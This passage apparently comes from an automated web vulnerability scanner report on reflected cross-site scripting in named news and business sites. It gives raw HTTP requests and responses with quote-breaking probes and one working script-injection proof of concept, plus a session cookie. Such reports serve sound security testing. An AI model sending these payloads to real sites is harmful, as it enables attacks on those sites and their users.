Expires: Sun, 19 Dec 2010 03:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:45 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business6c028';6a3c0b19ed8/best-cities/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business6c028';6a3c0b19ed8;kw=best-cities;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33e96'%3b61ea5a99c02 was submitted in the REST URL parameter 2. This input was echoed as 33e96';61ea5a99c02 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities33e96'%3b61ea5a99c02/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83924
Expires: Sun, 19 Dec 2010 03:08:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities33e96';61ea5a99c02/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities33e96';61ea5a99c02;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c6e'%3b7f37c9605a was submitted in the REST URL parameter 3. This input was echoed as 71c6e';7f37c9605a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture71c6e'%3b7f37c9605a/Technology+gives+outdoor+adventure+company+edge/2132724/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83845
Expires: Sun, 19 Dec 2010 03:08:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:59 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture71c6e';7f37c9605a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture71c6e';7f37c9605a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=74996098 ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faf95'%3bc230f167291 was submitted in the REST URL parameter 5. This input was echoed as faf95';c230f167291 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724faf95'%3bc230f167291/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71720
Expires: Sun, 19 Dec 2010 03:09:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture/technology-gives-outdoor-adventure-company-edge/2132724faf95';c230f167291/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture;kw=technology-gives-outdoor-adventure-company-edge;kw=2132724faf95';c230f167291;kw=npo;kw=f ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d53'%3bfc81ba2dd04 was submitted in the REST URL parameter 6. This input was echoed as 80d53';fc81ba2dd04 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/80d53'%3bfc81ba2dd04 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38381
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4235e'%3b197e146723c was submitted in the REST URL parameter 1. This input was echoed as 4235e';197e146723c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business4235e'%3b197e146723c/best-cities/joint-venture/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69709
Expires: Sun, 19 Dec 2010 02:58:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business4235e';197e146723c/best-cities/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business4235e';197e146723c;kw=best-cities;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ec53'%3b451c5dd64b0 was submitted in the REST URL parameter 2. This input was echoed as 5ec53';451c5dd64b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities5ec53'%3b451c5dd64b0/joint-venture/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69673
Expires: Sun, 19 Dec 2010 02:58:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities5ec53';451c5dd64b0/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities5ec53';451c5dd64b0;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b1e5'%3bf6daa34de79 was submitted in the REST URL parameter 3. This input was echoed as 5b1e5';f6daa34de79 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture5b1e5'%3bf6daa34de79/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69656
Expires: Sun, 19 Dec 2010 02:58:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture5b1e5';f6daa34de79/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture5b1e5';f6daa34de79;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=1252802 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3359'%3b930c56bb48d was submitted in the REST URL parameter 4. This input was echoed as e3359';930c56bb48d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/e3359'%3b930c56bb48d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43917
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1d5a'%3b751ceb65de was submitted in the REST URL parameter 1. This input was echoed as b1d5a';751ceb65de in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videob1d5a'%3b751ceb65de/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43056
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87fe6'%3bffef4397ad3 was submitted in the REST URL parameter 2. This input was echoed as 87fe6';ffef4397ad3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/87fe6'%3bffef4397ad3 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43111
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f018'%3bd9badb31fa was submitted in the REST URL parameter 1. This input was echoed as 2f018';d9badb31fa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides2f018'%3bd9badb31fa/holidays/ HTTP/1.1
Host: www.foodnetwork.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:16:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:16:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51622
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6cb'%3bef32a7e8c9e was submitted in the REST URL parameter 2. This input was echoed as cb6cb';ef32a7e8c9e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/holidayscb6cb'%3bef32a7e8c9e/ HTTP/1.1
Host: www.foodnetwork.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:16:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:16:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51616
1.313. http://www.manta.com/c/mtxl353/pla [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.manta.com
Path: /c/mtxl353/pla
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bc18"><script>alert(1)</script>63c157158a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/mtxl353/pla?7bc18"><script>alert(1)</script>63c157158a=1 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae57c'%3b8725fae52c1 was submitted in the REST URL parameter 1. This input was echoed as ae57c';8725fae52c1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assetsae57c'%3b8725fae52c1/images/arrow-sort-down.gif HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:25:19 GMT
Date: Sun, 19 Dec 2010 03:25:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47241
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0351'%3b825ccdc7209 was submitted in the REST URL parameter 2. This input was echoed as e0351';825ccdc7209 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/imagese0351'%3b825ccdc7209/arrow-sort-down.gif HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:25:29 GMT
Date: Sun, 19 Dec 2010 03:25:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46144
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad9a'%3b6c0973b62d9 was submitted in the REST URL parameter 1. This input was echoed as 4ad9a';6c0973b62d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets4ad9a'%3b6c0973b62d9/images/arrow-sort-up.gif HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:25:24 GMT
Date: Sun, 19 Dec 2010 03:25:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47220
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 372a9'%3b21f0eea1f7a was submitted in the REST URL parameter 2. This input was echoed as 372a9';21f0eea1f7a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/images372a9'%3b21f0eea1f7a/arrow-sort-up.gif HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:25:34 GMT
Date: Sun, 19 Dec 2010 03:25:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49098
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 363ab'%3b32caacdfa00 was submitted in the REST URL parameter 2. This input was echoed as 363ab';32caacdfa00 in the application's response.
